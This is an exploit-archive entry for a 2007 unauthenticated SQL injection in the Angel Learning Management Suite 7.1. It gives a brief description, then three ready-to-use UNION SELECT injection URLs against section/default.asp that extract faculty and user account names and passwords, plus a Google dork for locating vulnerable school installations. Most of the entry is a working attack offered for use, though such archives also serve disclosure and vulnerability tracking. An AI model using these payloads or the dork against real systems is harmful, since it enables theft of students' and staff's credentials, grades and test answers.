Angel Lms 7.1 - 'default.asp?id' SQL Injection



EKU-ID: 11367 CVE: OSVDB-33846;CVE-2007-1250 OSVDB-ID:
Author: Craig Heffner Published: 2007-03-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#########################################################################
#
# Application:
#
#		Angel Learning Management Suite 7.1
#		http://www.angellearning.com
#
#########################################################################
#
# Description:
#
#		"ANGEL LMS is an inclusive suite of enterprise
#		learning management tools that balances ease of
#		use with powerful capabilities to deliver leading
#		edge teaching and learning, impact learner success
#		and measure effectiveness."
#
#		Basically, Angel is a CMS for education, providing
#		online forums, grading, email, chat, etc to faculty
#		and students. It is used as the primary Web interface
#		for several online schools and courses.
#
#########################################################################
#
# Vulnerability:
#
#		Angel 7.1 contains an SQL injection vulnerability in
#		section/default.asp that grants an un-authenticated user
#		access to all database tables and data. Examples include
#		enumeration of tables, columns, user names, passwords,
#		grades, and test questions/answers (you basically have
#		access to everything).
#
#########################################################################
#
# Exploit Examples:
#
#	#Enumerate Faculty User Accounts#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20faculty_accounts--"
#
#	#Enumerate All User Accounts#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"
#
#	#Enumerate Account Passwords#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"
#
#########################################################################
#
# Google Dork:
#		intext:"2006 angel learning, inc" -pdf
#
#########################################################################
#
# Credit:
#	Exploit discovered and coded by Craig Heffner
#	heffnercj [at] gmail.com
#	http://www.craigheffner.com
#
#########################################################################

# milw0rm.com [2007-03-01]